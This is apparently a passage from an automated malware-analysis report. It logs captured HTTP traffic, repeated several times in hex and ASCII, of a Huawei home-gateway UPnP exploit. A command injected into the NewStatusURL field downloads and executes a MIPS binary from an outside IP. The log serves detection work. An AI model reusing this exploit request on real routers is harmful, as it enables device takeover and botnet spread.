73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 